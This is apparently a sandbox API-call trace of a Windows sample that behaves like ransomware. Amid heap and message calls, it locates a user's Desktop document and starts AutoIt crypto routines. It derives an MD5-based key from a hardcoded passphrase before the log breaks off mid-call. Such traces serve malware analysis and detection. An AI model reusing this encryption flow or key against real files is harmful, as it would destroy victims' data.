[0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.787] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.787] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.787] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0131.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0131.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0131.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0131.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0131.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0131.789] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.789] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.789] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caa48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0131.789] CloseHandle (hObject=0x258) returned 1 [0131.789] FreeLibrary (hLibModule=0x772d0000) returned 1 [0131.789] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.790] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.790] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0131.790] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.790] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb24f7de0, ftCreationTime.dwHighDateTime=0x1d5ea8d, ftLastAccessTime.dwLowDateTime=0xbb1d0940, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xbb1d0940, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0x941f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="dcplTjPjl4z2QV.odp", cAlternateFileName="DCPLTJ~1.ODP")) returned 0x41ac200 [0131.790] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0131.790] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.790] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.790] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.790] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0131.790] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.790] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.790] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0131.790] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.790] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.791] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.826] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.826] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0131.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0131.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0131.826] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0131.827] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.827] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.827] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0131.827] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.827] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.827] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.828] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.828] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0131.828] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.828] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.828] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.828] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.828] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.829] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0131.829] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0131.829] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.829] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.829] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.829] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.829] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.829] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0131.829] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cae80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0131.829] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0131.829] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.829] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.829] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.829] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0131.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0131.829] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0131.830] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0131.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0131.830] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.830] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb018, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0131.830] CryptHashData (hHash=0x41ac140, pbData=0x17e2b48, dwDataLen=0x22, 